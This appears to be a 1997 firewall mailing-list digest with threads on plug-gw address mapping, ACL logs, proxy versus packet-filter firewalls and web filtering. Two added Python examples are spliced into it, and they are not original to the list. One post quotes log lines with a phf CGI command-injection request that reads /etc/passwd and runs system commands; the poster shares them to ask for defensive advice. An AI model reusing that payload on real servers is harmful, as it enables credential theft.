  fwallIP      is an address on the firewall which the destination will see the connection as coming from (e.g. w, x, y, or z). If fwallIP is not a valid address on the firewall, the connection will fail.

This works. I have it in use on a couple of different production firewalls. It's certainly not a great solution, but it works without having to make kernel modifications.

The problem with this, though, is that it doesn't scale well. There are two reasons:

a) You have to have a unique IP address on the client side of the firewall for every server on the server side. This won't work well if your firewall connects to the Internet where there are a *LOT* of servers.

b) The number of configuration lines to set this up is a multiple of the number of clients, servers, directions and ports. So if you have 50 clients, 2 servers, 1 port, and connections need to be initiated in both directions, you'll need 50 * 2 * 2 * 1 = 200 config lines.

Even if it doesn't scale well, it works and it's not hard to do.
(*) I have read the TIS license agreement and I am *NOT* going to distribute a patch. The license agreement grants me the license to modify the TIS source code for my own organization's use. I'm not a lawyer. I don't know if that means I can't legally distribute patches, but it sure sounds like it.

Cheers,
--
Mark Horn
PGP Public Key available from: http://www.es.net/hypertext/pgp.html
PGP KeyID/fingerprint: 00CBA571/32 4E 4E 48 EA C6 74 2E 25 8A 76 E6 04 A1 7F C1

From owner-firewalls-outgoing Wed Jun 4 08:01:38 1997
Message-ID: <33957186.D8E5317F@logicnet.ro>
Date: Wed, 04 Jun 1997 16:45:42 +0300
From: Corneliu Tanasa
Organization: LOGIC TELECOM SA
To: firewalls@greatcircle.com
Subject: Strange logs

Hi,

Today I found a line like this in my Cisco logs:

    %SEC-6-IPACCESSLOGP: list 183 denied udp xxx.xxx.xxx.xxx(0) -> yyy.yyy.yyy.yyy(162), 1 packet

Has anyone any idea about what this means? I was very surprised about the source port that is zero. Should I be worried that someone is trying an attack?
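The access-list log line Corneliu asks about, run through a small parser and triage check. This is an added example, not code from the post or from Cisco; the log lines, addresses (documentation ranges) and function names are constructed for it.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Pattern for the IOS access-list log message quoted in the post:
#   %SEC-6-IPACCESSLOGP: list 183 denied udp a.b.c.d(0) -> w.x.y.z(162), 1 packet
# IPACCESSLOGP is the variant that carries port numbers, so only tcp/udp appear.
LOG_RE = re.compile(
    r"%SEC-6-IPACCESSLOGP: list (?P<acl>\S+) (?P<action>permitted|denied) "
    r"(?P<proto>tcp|udp) (?P<src>\d{1,3}(?:\.\d{1,3}){3})\((?P<sport>\d+)\) -> "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})\((?P<dport>\d+)\), (?P<count>\d+) packets?"
)


@dataclass
class AclEvent:
    acl: str
    action: str
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    count: int


def parse_acl_log(line: str) -> Optional[AclEvent]:
    """Parse one IPACCESSLOGP line; return None for any other syslog message."""
    m = LOG_RE.search(line)
    if m is None:
        return None
    return AclEvent(m["acl"], m["action"], m["proto"], m["src"], int(m["sport"]),
                    m["dst"], int(m["dport"]), int(m["count"]))


def triage(ev: AclEvent) -> List[str]:
    """Reasons an event deserves a closer look; an empty list means routine ACL noise."""
    reasons = []
    if ev.sport == 0:
        # A normal client never sends from port 0: it is reserved, and the stack
        # allocates an ephemeral source port instead. Port 0 in the log therefore
        # points to a hand-crafted packet, or to a non-initial IP fragment that
        # carries no transport header for the router to read ports from. Check
        # for fragments before concluding the packet was crafted.
        reasons.append("source port 0: crafted packet or non-initial fragment")
    if ev.proto == "udp" and ev.dport == 162:
        # Unsolicited traffic to the SNMP trap port from outside is worth
        # correlating with other probes of management ports from the same source.
        reasons.append("destination is snmptrap (udp/162), a management port")
    if ev.count > 1:
        reasons.append(f"{ev.count} packets matched in one log interval")
    return reasons


def review(lines: List[str]) -> List[Tuple[str, str, int, List[str]]]:
    """(src, dst, dport, reasons) for every denied event that raised at least one reason."""
    findings = []
    for line in lines:
        ev = parse_acl_log(line)
        if ev is None or ev.action != "denied":
            continue
        reasons = triage(ev)
        if reasons:
            findings.append((ev.src, ev.dst, ev.dport, reasons))
    return findings


# Constructed sample log (hypothetical router "rtr1"); the first line mirrors the
# one in the post with the masked addresses replaced by documentation-range ones.
SAMPLE_LOG = [
    "Jun  4 14:02:11 rtr1 12: %SEC-6-IPACCESSLOGP: list 183 denied udp "
    "198.51.100.7(0) -> 192.0.2.5(162), 1 packet",
    "Jun  4 14:02:40 rtr1 13: %SEC-6-IPACCESSLOGP: list 183 permitted tcp "
    "192.0.2.9(1034) -> 198.51.100.20(80), 1 packet",
    "Jun  4 14:03:02 rtr1 14: %SEC-6-IPACCESSLOGP: list 183 denied tcp "
    "198.51.100.7(40123) -> 192.0.2.5(23), 5 packets",
    "Jun  4 14:03:30 rtr1 15: %LINK-3-UPDOWN: Interface Serial0, changed state to up",
]

if __name__ == "__main__":
    for src, dst, dport, reasons in review(SAMPLE_LOG):
        print(f"{src} -> {dst}:{dport}: " + "; ".join(reasons))
```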
Thanks,
Corneliu Tanasa

From owner-firewalls-outgoing Wed Jun 4 08:15:38 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id EAA06000 for firewalls-outgoing; Wed, 4 Jun 1997 04:55:26 -0700 (PDT)
Received: from mailhuba.bis.bls.com (firewall2.bls.com [192.203.159.3]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id EAA05945 for ; Wed, 4 Jun 1997 04:54:51 -0700 (PDT)
Received: from x400gw.bls.com by mailhuba.bis.bls.com (X.400 to RFC822 Gateway); Wed, 4 Jun 1997 07:58:20 -0500
X400-Received: by mta blsMTA in /c=us/admd=bellsouth/; Relayed; 04 Jun 1997 07:58:19 -0500
X400-Received: by /c=us/admd=bellsouth/; Relayed; 04 Jun 1997 07:58:19 -0500
X400-MTS-Identifier: [/c=us/admd=bellsouth/; 039FA3395666B4AD-blsMTA]
Content-Identifier: 039FA3395666B4AD
Content-Return: Allowed
X400-Content-Type: P2-1988 ( 22 )
Conversion: Allowed
Original-Encoded-Information-Types: IA5-Text
Disclose-Recipients: Prohibited
Alternate-Recipient: Allowed
X400-Originator: Frataccia.Rick@bis.bls.com
X400-Recipients: non-disclosure;
Message-Id: <039FA3395666B4AD*/c=us/admd=BellSouth/prmd=bis/o=ccmail/s=Frataccia/g=Rick/@MHS>
Date: 04 Jun 1997 07:58:19 -0500
From: RICK FRATACCIA
To: firewalls@GreatCircle.COM (IPM Return requested), msquared@hypercon.com (IPM Return requested)
Subject: Re: RAPTOR WEBNOT SITE BLOCKING
MIME-Version: 1.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Mike,

In reference to your comment, do you know if cybernot will work with
raptor 4.0 on Solaris? Raptor personnel say that only WebNOT works with
Raptor.

Rick

______________________________ Reply Separator _________________________________
Subject: RAPTOR WEBNOT SITE BLOCKING
Author:  msquared@hypercon.com at SMTPMAIL
Date:    6/3/97 7:07 PM

It was written:
"
>From: Allen Rogers
>Subject: Re: Does Raptor WebNOT Block Legitimate Sites?
>
>
>This is a list that Raptor licenses directly from Microsystems.
>The actual
>URLs used, and their abbreviated nature, is due to how Microsystems chooses
>to create their list. I am trying to open a formal path where our customers
>can present queries/requests to them directly for particular sites. I will
>keep you posted."
>
CyberPatrol gives two forms at their site for 1) adding a site to the list
of blocked sites - http://www.microsys.com/cybernot/form_add.htm or
2) removing a site from the list - http://www.microsys.com/cybernot/form_rev.htm.
I've seen them take action in as little as two hours. They have always
responded the next business day with a confirming mail note.

Mike

From owner-firewalls-outgoing Wed Jun 4 08:32:03 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA13726 for firewalls-outgoing; Wed, 4 Jun 1997 06:34:11 -0700 (PDT)
Received: from brimstone.rnb.com (brimstone.rnb.com [204.178.80.14]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA13582 for ; Wed, 4 Jun 1997 06:33:31 -0700 (PDT)
Received: by brimstone.rnb.com; id JAA12657; Wed, 4 Jun 1997 09:37:03 -0400
Received: from relay.rnb.com(199.99.101.2) by brimstone.rnb.com via smap (3.2) id xma012431; Wed, 4 Jun 97 09:36:36 -0400
Received: from monarch.rnb.com (monarch [150.1.29.115]) by relay.rnb.com (8.8.5/8.8.5) with SMTP id JAA26001; Wed, 4 Jun 1997 09:36:35 -0400 (EDT)
Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Comments: Internet Message: Sender identity is not verified.
Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Message-ID:
X-Mailer: XFMail 1.2-alpha [p0] on Solaris
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
In-Reply-To:
Date: Wed, 04 Jun 1997 09:32:25 -0400 (EDT)
Organization: Republic National Bank
From: Ken Kempster
To: "Amy (Cremer) Briggs"
Subject: RE: Solaris
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On 03-Jun-97 "Amy (Cremer) Briggs" wrote:
>First of all if there is a better list to post this to please let me know.
>I've checked out Suns web site and didn't find any mention of a Solaris
>listserv.
>
>Does anyone know how can you trick a Solaris box into
>treating a class C address as a class B. For example we want to use
>2xx.xx.0.0 as a class B address. I've entered the class B subnetmask for

It is possible to turn a class C into a class B but you do it by using
non-standard subnet masking; you can't use the standard class B subnet
mask. There is a way to calculate the subnet mask based on the range of
IP's you will be using within the class C address when you break it up.
A book detailing the functionality of the IP stack should have in detail
how to do this.

>this network in the /etc/netmasks file which is how I thought you could do it
>but it isn't working for me. It still thinks its a class C address and won't
>route properly if I set up my routes using it as a class B address.
>Finding a way to make this work would save me hours of time because I
>have 5 full class B(Technically class C) networks to do this for and
>entering all the class C's within all 5 class B's would take me awhile as
>well as complicate my routing table.
>
>Thanks for any help or information you can give me.
>
>Amy
>
>\\\\\\\\\\\\\\Amy Briggs  Microcomputer Support Specialist///////////////
>              Library of Michigan            amyc@libofmich.lib.mi.us
>\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\////////////////////////////////////////////
>         ** Its not what you've got, its what you give--TESLA **
>
>

|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| Ken Kempster                kempster@monarch.rnb.com    |
| Network Systems Engineer           _\|/_                |
| Republic National Bank             (o o)                |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~

From owner-firewalls-outgoing Wed Jun 4 09:00:52 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA29865 for firewalls-outgoing; Wed, 4 Jun 1997 08:43:54 -0700 (PDT)
Received: from psyche.the-wire.com (psyche.the-wire.com [198.53.192.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA29834 for ; Wed, 4 Jun 1997 08:43:44 -0700 (PDT)
Received: from anton.the-wire.com (anton.the-wire.com [205.206.32.227]) by psyche.the-wire.com (8.8.5/8.6.12) with SMTP id LAA05990; Wed, 4 Jun 1997 11:47:33 -0400 (EDT)
Message-Id: <3.0.32.19970604114909.00952700@the-wire.com>
X-Sender: anton@the-wire.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Wed, 04 Jun 1997 11:49:24 -0400
To: "Mark Horn [ Net Ops ]"
From: Anton J Aylward
Subject: Re: Plug-gw- One to many relationship
Cc: Firewalls@GreatCircle.COM
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 10:41 AM 04/06/97 -0400, Mark Horn [ Net Ops ] wrote:
>
>You want both clients to be able to plug to either server. To accomplish
>this, assign two addresses to the firewall on the client side and two
>addresses to the firewall on the server side so that you have:
>
>        client A     W    Y    server C
>                   firewall
>        client B     X    Z    server D

No, no, no, what *I* want and what about 10^7 other sites want is this...
        client A     W              server C
                   firewall         server D
        client B                    server F
                                    server G
                                    server H
                                    server I
                                    server K

Now that's what *I* call a one to many mapping. You come up with a good
way to do this and you'll be famous. One public address, and a 10.x.x.x
of internal addresses and web servers. POW! The address space problem
just went away.

Well, we can dream can't we?
(maybe I should have littered this with smileys so I don't get flamed.
Oh well)

--------------------------------------------------------------------------
Anton J Aylward                    | So, Two cheers for Democracy: one
The Strahn & Strachan Group Inc    | because it admits variety and two
Information Security Consultants   | because it permits criticism.
Voice: (416) 494-8661              |                   - E. M. Forster
Fax:   (416) 494-8803              |

From owner-firewalls-outgoing Wed Jun 4 09:02:57 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA16235 for firewalls-outgoing; Wed, 4 Jun 1997 06:49:24 -0700 (PDT)
Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA16227 for ; Wed, 4 Jun 1997 06:49:14 -0700 (PDT)
Received: from cons-evyncke.cisco.com (brussels-ppp5.cisco.com [171.68.146.26]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id PAA10173; Wed, 4 Jun 1997 15:50:23 +0200 (METDST)
Message-Id: <3.0.32.19970604141245.006e8264@brussels.cisco.com>
X-Sender: evyncke@brussels.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Wed, 04 Jun 1997 15:53:05 +0000
To: Pedro Salgueiro , "'Mike Jones'"
From: Eric Vyncke
Subject: RE: PIX and Firewall-1
Cc: "'firewalls'"
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi Pedro,

Even if I am working for Cisco, may I add the following inline comments?

You should not confuse between:
- packet filtering routers, i.e.
  plain Cisco or xxx routers with cumbersome and intricate access control lists
- a firewall component which uses a more evolved inspection technique like
  PIX or Firewall-1

At 09:29 4/06/97 +0100, Pedro Salgueiro wrote:
>Hi to all,
>
>I've been "watching" the discussion regarding the differences between
>packet-filtering and application level firewalls. I believe that there
>are some:
>1 - Packet filtering firewalls are more difficult to manage (It is very
>simple to mis-configure => less secure).
>It may be very complicated establishing rules.

True for routers, not true for components like PIX or Firewall-1. The
latter are more protocol aware and thus ACL are much easier to configure.

>2 - Packet filter systems are always routing packets (so "fail-open" may
>occur). A well known constructor firewall crashed with a ping attack and
>routed all the packets from the insecure network to the secure one.

True again for routers, but false for PIX/FW-1.

>3 - If you are using a packet filter system and you provide SMTP, HTTP,
>etc. you cannot control what the users do with those protocols, i.e., you
>open or close a port. Application level firewalls provide secure daemons
>of those protocols.

True again for routers, but false for PIX/FW-1. The latter have the
knowledge of HTTP, SMTP, ... protocols and actually analyse the traffic
to make their decision.

Hope this helps

>Regards,
>
>Pedro Salgueiro
>
>Data General Portugal
>Tel. +351 - 1 - 4129600
>Fax. +351 - 1 - 4129699
>mailto:psalgueiro@pt.europe.dg.com
>
>R. Dr. António Loureiro Borges nº2
>Arquiparque - Miraflores
>1495 Algés
>Portugal
>______________________________________________
>"Don't take life too serious no one gets out alive!!!! :-)"
>
>* These are my own opinions and do not reflect those of the company *
>
>----------
>From: Mike Jones
>Sent: Wednesday, 4 June 1997 8:55
>To: mfiocchi@otm.it; firewalls@GreatCircle.COM; carlsonp@sprynet.com
>Subject: Re: PIX and Firewall-1
>
>Peter Carlson writes....
>> There are many comparisons made by datacomm, lan times, ziff-davis and
>> others. Keep in mind that both pix and fw-1 are glorified packet filters,
>> even though they have a fancy name for it. I would stick with an
>> application level gateway. They are well accepted and known for being more
>> secure.
>
>Many things are known that aren't so. This claim comes by periodically
>in this forum, and I have yet to get an answer to this question: in
>what way are application level gateways more secure than, say, FW-1 or PIX?
>There are certainly capabilities that can be provided via application
>proxies that can't be provided by any filter-based technologies, but what
>types of attacks are a FW-1 or a PIX vulnerable to that application
>proxies aren't?
>--
> Mike Jones
> Sr. Technology Advisor
> UNIFIED Technologies
>
>

From owner-firewalls-outgoing Wed Jun 4 09:15:35 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA02125 for firewalls-outgoing; Wed, 4 Jun 1997 08:56:36 -0700 (PDT)
Received: from freenet.grfn.org (grfn.org [206.30.236.51]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA02085 for ; Wed, 4 Jun 1997 08:56:23 -0700 (PDT)
Received: from unknown (dlup59.i2k.com [199.176.248.59]) by freenet.grfn.org (8.8.5/8.8.5) with SMTP id LAA11368 for ; Wed, 4 Jun 1997 11:54:30 -0400 (EDT)
Message-ID:
In-Reply-To: <3395210C.7EAF@pdx.com.my>
References: Conversation <0C673F68C3A0D011A94208002BE526253524@USBGREXCH01> with last message <3395210C.7EAF@pdx.com.my>
X-MSMail-Priority: Normal
X-Priority: 3
To: "Firewalls Mailing List"
MIME-Version: 1.0
From: "Mariko Yashada"
Subject: Re: ISP Connection
Date: Wed, 04 Jun 97 12:01:18 PDT
Content-Type: text/plain; charset="ISO-8859-1"; X-MAPIextension=".TXT"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Thank you for all your comments.

Last fall our plan was to connect to the Internet through MCI.
We security people said fine, but you will need a firewall for any
connections between the Internet and the Enterprise Network. So we did
an evaluation of firewalls and settled on two we felt best suited our
needs. The firewall added enough cost to the project that it was
postponed. It has now been revived using our ISP for the connection
with the hope the ISP can some way offer the security. I see now we
should follow our original plan and put up a firewall at our end.

Here is a related question: There is another local ISP who will connect
us at T1 and install a firewall at our location. They will then
administer the firewall remotely from their location. They support
three different firewalls, Gauntlet, Firewall-1 and Borderware. The
advantage is the savings in admin costs. Has anyone had any experience
with this type of arrangement? We have also talked to BBN about their
Site Patrol product, which is a remotely managed Gauntlet.

Thanks,
Mariko

From owner-firewalls-outgoing Wed Jun 4 10:00:50 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA01980 for firewalls-outgoing; Wed, 4 Jun 1997 08:55:45 -0700 (PDT)
Received: from paranoid.convey.ru (ws04.convey.ru [195.182.128.19]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA01898 for ; Wed, 4 Jun 1997 08:55:24 -0700 (PDT)
Received: (from ark@localhost) by paranoid.convey.ru (8.7.5/8.7.3) id TAA00888; Wed, 4 Jun 1997 19:01:13 +0400
From: ArkanoiD
Message-Id: <199706041501.TAA00888@paranoid.convey.ru>
Subject: Re: Plug-gw- One to many relationship
To: mhorn@funb.com (Mark Horn [ Net Ops ])
Date: Wed, 4 Jun 1997 19:01:12 +0400 (MSD)
Cc: mjr@clark.net, Firewalls@GreatCircle.COM
In-Reply-To: <19970604104101.02710@capmark.funb.com> from "Mark Horn [ Net Ops ]" at Jun 4, 97 10:41:01 am
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Sender: firewalls-owner@GreatCircle.COM
Precedence:
bulk

nuqneH,

> This works. I have it in use on a couple of different production
> firewalls. It's certainly not a great solution, but it works without
> having to make kernel modifications. The problem with this, though, is
> that it doesn't scale well. There are two reasons:
>
>     a) You have to have a unique IP address on the client side of the
>        firewall for every server on the server side. This won't
>        work well if your firewall connects to the Internet where
>        there are a *LOT* of servers.
>
>     b) The number of configuration lines to set this up is a multiple
>        of the number of clients, servers, directions and ports.
>        So if you have 50 clients, 2 servers, 1 port, and
>        connections need to be initiated in both directions,
>        you'll need 50 * 2 * 2 * 1 = 200 config lines.
>
> Even if it doesn't scale well, it works and it's not hard to do.
>
> (*) I have read the TIS license agreement and I am *NOT* going to
>     distribute a patch. The license agreement grants me the license
>     to modify the TIS source code for my own organization's use. I'm
>     not a lawyer. I don't know if that means I can't legally
>     distribute patches, but it sure sounds like it.
>

Hmm, hey TIS people, is it true? If yes - can you allow him to distribute
the patch?

--
 _ _ _ _ _ _ _                       {::} {::} {::}  CU in Hell
_| o |_ | | _|| | / _||_| |_ |_ |_   (##) (##) (##)  /Arkan#iD
|_ o _||_| _||_| / _| | o |_||_||_|  [||] [||] [||]  Do i believe in Bible? Hell,man,i've seen one!
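The configuration scheme quoted above (one firewall address per server on the client side, one per client on the server side, and a rule per client/server/port/direction) is mechanical enough to generate rather than type. The generator below is an added example and is not Mark Horn's plug-gw modification nor TIS Firewall Toolkit code; it assumes the rule syntax given in his post and the caveat that `-srcip` must be an address actually configured on the firewall. The hosts and firewall addresses are constructed placeholders (192.0.2.0/24 on the client side, 10.1.1.0/24 on the server side), standing in for A, B, C, D and W, X, Y, Z.

```python
"""Generate and sanity-check plug-gw rules for the address-per-peer scheme.

Added example, not Mark Horn's plug-gw patch and not TIS Firewall Toolkit
code.  Assumed rule syntax (from the post):

    plug-gw: ip <clientIP> port <listenPort> <allowedhosts> \\
        -plug-to <destIP> [ -port <destport> ] [ -srcip <fwallIP> ] [ -privport ]

All addresses below are constructed placeholders.
"""
from typing import Dict, Iterable, List


def forward_rules(client_side: Dict[str, str], server_side: Dict[str, str],
                  ports: Iterable[int]) -> List[str]:
    """Rules for the client -> server direction.

    client_side maps each server to the firewall address, on the client
    network, that clients connect to in order to reach that server
    (W for C, X for D in the post).  server_side maps each client to the
    firewall address, on the server network, that the server sees the
    connection coming from (Y for A, Z for B).
    """
    ports = list(ports)
    rules = []
    for client, fw_src in server_side.items():
        for server, fw_listen in client_side.items():
            for port in ports:
                rules.append(
                    f"plug-gw: ip {fw_listen} port {port} {client} "
                    f"-plug-to {server} -srcip {fw_src}"
                )
    return rules


def reverse_rules(client_side: Dict[str, str], server_side: Dict[str, str],
                  ports: Iterable[int]) -> List[str]:
    """Rules for the server -> client direction: the two maps swap roles.

    A server connects to the firewall address dedicated to the client it
    wants (Y for A) and the client sees the connection coming from the
    firewall address dedicated to that server (W for C).
    """
    ports = list(ports)
    rules = []
    for server, fw_src in client_side.items():
        for client, fw_listen in server_side.items():
            for port in ports:
                rules.append(
                    f"plug-gw: ip {fw_listen} port {port} {server} "
                    f"-plug-to {client} -srcip {fw_src}"
                )
    return rules


def generate(client_side: Dict[str, str], server_side: Dict[str, str],
             ports: Iterable[int], both_directions: bool = True) -> List[str]:
    """Full rule set; its size is clients * servers * ports * directions."""
    ports = list(ports)
    rules = forward_rules(client_side, server_side, ports)
    if both_directions:
        rules += reverse_rules(client_side, server_side, ports)
    return rules


def expected_count(n_clients: int, n_servers: int, n_ports: int,
                   n_directions: int) -> int:
    """The scaling formula from the post (50 * 2 * 1 * 2 = 200)."""
    return n_clients * n_servers * n_ports * n_directions


def bad_srcip_rules(rules: List[str], firewall_addrs: Iterable[str]) -> List[str]:
    """Return the rules whose -srcip is not an address on the firewall.

    The post says such a connection simply fails, so catching it when the
    config is generated is cheaper than finding it in the logs later.
    """
    fw = set(firewall_addrs)
    bad = []
    for rule in rules:
        tokens = rule.split()
        if "-srcip" in tokens and tokens[tokens.index("-srcip") + 1] not in fw:
            bad.append(rule)
    return bad


if __name__ == "__main__":
    # The post's example: two clients, two servers, one port, both directions.
    client_side = {"10.1.1.10": "192.0.2.1", "10.1.1.11": "192.0.2.2"}  # C->W, D->X
    server_side = {"192.0.2.10": "10.1.1.1", "192.0.2.11": "10.1.1.2"}  # A->Y, B->Z
    for rule in generate(client_side, server_side, [25]):
        print(rule)
```

Running the main block prints the eight rules for the two-by-two case; passing a fifty-entry `server_side` map reproduces the 200-line count from the post, and also makes the other scaling problem visible, since the firewall then needs fifty distinct server-side addresses.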
From owner-firewalls-outgoing Wed Jun 4 10:01:38 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA03048 for firewalls-outgoing; Wed, 4 Jun 1997 09:02:01 -0700 (PDT)
Received: from guru.unixpros.com (guru.unixpros.com [207.17.234.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA03033 for ; Wed, 4 Jun 1997 09:01:54 -0700 (PDT)
Message-Id: <199706041601.JAA03033@honor.greatcircle.com>
Received: by guru.unixpros.com (1.38.193.4/16.2) id AA24983; Wed, 4 Jun 1997 12:04:34 -0400
From: Stan Wnuck
Subject: getting passwd file via WWW
To: Firewalls@GreatCircle.COM
Date: Wed, 4 Jun 97 12:04:34 EDT
Mailer: Elm [revision: 70.85]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi all,

I have noticed on my WWW log files the following 2 entries.

some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143

Does anyone know anything about these cgi scripts or programs? Or how
dangerous this is? I changed the real source location to a fake
some.remote.location.edu to not let out the bag of the source of this
hack, since I am not sure what my next move would be.

Thanks in advance.

Stan Wnuck                               swnuck@unixpros.com
Unixpros, Inc.
10 Industrial Way East                   (908) 389-3295 x542
Eatontown, NJ 07724                      (908) 389-5461 Fax
PM-CHS Technology Insertion Office
Ft.
Monmouth Army Base, NJ                   (908) 427-2033 / 427-6963

From owner-firewalls-outgoing Wed Jun 4 10:39:09 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA09635 for firewalls-outgoing; Wed, 4 Jun 1997 09:40:35 -0700 (PDT)
Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA09603 for ; Wed, 4 Jun 1997 09:40:16 -0700 (PDT)
Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id LAA24931; Wed, 4 Jun 1997 11:28:29 -0400
Date: Wed, 4 Jun 1997 11:28:25 -0400 (EDT)
From: Rabid Wombat
To: Jyri Kaljundi
cc: Firewalls@GreatCircle.COM
Subject: Re: Security Crazy
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sun, 1 Jun 1997, Jyri Kaljundi wrote:
>
> Sat, 31 May 1997, Marcus J. Ranum wrote:
>
> >> my CEO has gone security crazy [...] win95
> >
> > He's a bit unclear on the concept, isn't he?
>
> I am pretty sure there actually are good commercial systems available to
> make large number of win95 machines much more secure than as they are
> out-of-box.

All things are relative ...

From owner-firewalls-outgoing Wed Jun 4 11:00:43 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA23626 for firewalls-outgoing; Wed, 4 Jun 1997 10:58:32 -0700 (PDT)
Received: from nexus.net.mx (nexusparc.acnet.net [167.114.25.165]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA21897 for ; Wed, 4 Jun 1997 10:49:07 -0700 (PDT)
Received: (from jdelgado@localhost) by nexus.net.mx (8.8.5/8.7.2) id MAA23460; Wed, 4 Jun 1997 12:58:27 -0500 (CDT)
Date: Wed, 4 Jun 1997 12:58:27 -0500 (CDT)
From: Jose Luis Delgado
To: firewalls@GreatCircle.Com
Subject: Secure Telnet!
In-Reply-To: <33956E4A.6590018C@pvt.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Ssh (Secure Shell) is a program to log into another computer over a
> network, to execute
> commands in a remote machine, and to move files from one machine to
> another. It provides strong
> authentication and secure communications over insecure channels.
>

Hi to everyone!

Does anybody know where can I find shareware/freeware SECURE telnet for
NT???

Thanks in advance!

From owner-firewalls-outgoing Wed Jun 4 11:49:32 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA04001 for firewalls-outgoing; Wed, 4 Jun 1997 09:09:05 -0700 (PDT)
Received: from ACSacs.Com (sprite.acsacs.com [206.16.240.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA03992 for ; Wed, 4 Jun 1997 09:08:58 -0700 (PDT)
Date: Wed, 4 Jun 1997 09:13:09 -0700
From: "Daniel J Blander - Sr. Systems Engineer for ACS"
X-Sender: phaedrus@ferrari
To: Pedro Salgueiro
cc: "'Mike Jones'" , "'firewalls'"
Subject: RE: PIX and Firewall-1 (Thesis Length)
In-Reply-To: <01BC70CA.41A88880@pcpedro>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I disagree and agree (in that order)....

On Wed, 4 Jun 1997, Pedro Salgueiro wrote:

> I've been "watching" the discussion regarding the differences between
> packet-filtering and application level firewalls. I believe that there
> are some:
> 1 - Packet filtering firewalls are more difficult to manage
> (It is very simple to mis-configure => less secure).
> It may be very complicated establishing rules.

Most firewalls are "difficult" to configure. One is not necessarily more
difficult to configure than another. Even application level firewalls
ask you to list valid hosts, networks, etc - so misconfiguration can be
just as difficult.
The focus should be on the tools used to configure the rules. If they
are lacking and poor, like anything else, it will be hard to configure.

> 2 - Packet filter systems are always routing packets
> (so "fail-open" may occur). A well known constructor firewall crashed
> with a ping attack and routed all the packets from the insecure
> network to the secure one.

Unfortunately the conclusion that you draw from this example is not
quite accurate. Yes, packet filtering systems and stateful-inspection
firewalls do route packets (and *yes* virginia, they are two different
types of firewalls) but that does not necessarily mean that "fail-open"
occurs. I can list at least one vendor where the failure of the firewall
causes packets *not* to be routed (good old systems that allow
ip-forwarding to be turned off and then the firewall, while up, forwards
